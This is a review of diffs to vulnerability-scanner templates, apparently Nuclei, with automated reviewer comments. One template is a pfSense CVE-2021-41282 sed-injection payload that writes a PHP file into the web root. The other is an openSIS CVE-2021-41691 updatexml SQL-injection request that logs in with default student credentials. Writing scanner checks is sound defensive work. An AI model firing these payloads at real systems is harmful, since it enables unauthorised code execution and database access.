/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1 Host: {{Hostname}} + - | GET /test.php HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" - - "status_code==200" - condition: and - + cookie-reuse: true extractors: - type: regex name: csrf_token + part: body + internal: true group: 1 regex: - '(sid:[a-z0-9,;:]+)' - internal: true - part: body -# digest: 4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: dsl + dsl: + - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" + - "status_code==200" + condition: and \ No newline at end of file 
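Review bot: The renamed template (`pfSense Arbitrary File Write to RCE`) writes `test.php` into the web root and then requests it (the payload self-deletes on that request), yet the new-side tag list `cve,cve2021,pfsense,rce,authenticated` carries no `intrusive` marker, so operators who exclude on that tag will run a file-writing check unknowingly; add `intrusive` to `tags`. The vendor advisory `https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc` is removed from the references while third-party write-ups stay; it is the fix record and belongs in the list. The `cwe-id` moves from CWE-74 to CWE-94 — either is arguable for sed-script injection, so settle it against the NVD entry rather than toggling.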
diff --git a/poc/cve/cve-2021-41691.yaml b/poc/cve/cve-2021-41691.yaml index 2157dc2b57..8c322f61ff 100644 --- a/poc/cve/cve-2021-41691.yaml +++ b/poc/cve/cve-2021-41691.yaml @@ -4,24 +4,16 @@ info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high - description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. - remediation: | - Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). + description: "openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php." reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - metadata: - max-request: 2 - tags: cve,cve2021,sqli,auth,edb,opensis -variables: - num: "999999999" + tags: cve,cve2021,opensis,sqli,auth -http: +requests: - raw: - | POST /index.php HTTP/1.1 
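Review bot: The reference `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169` retained on the new side lacks the final digit of `cve-id: CVE-2021-41691` and would point at a different CVE; it should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691`. Removing `variables: num` here means the second request in the following hunk (which runs past this chunk) inlines the probe value instead; functionally fine, but the variable kept that marker in one place. The classification still lists only cve-id — no cwe-id or CVSS — so `severity: high` is unsupported within the file.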
@@ -30,24 +22,30 @@ http: Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student + password: - student@123 + + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: - 'contains(body_2, "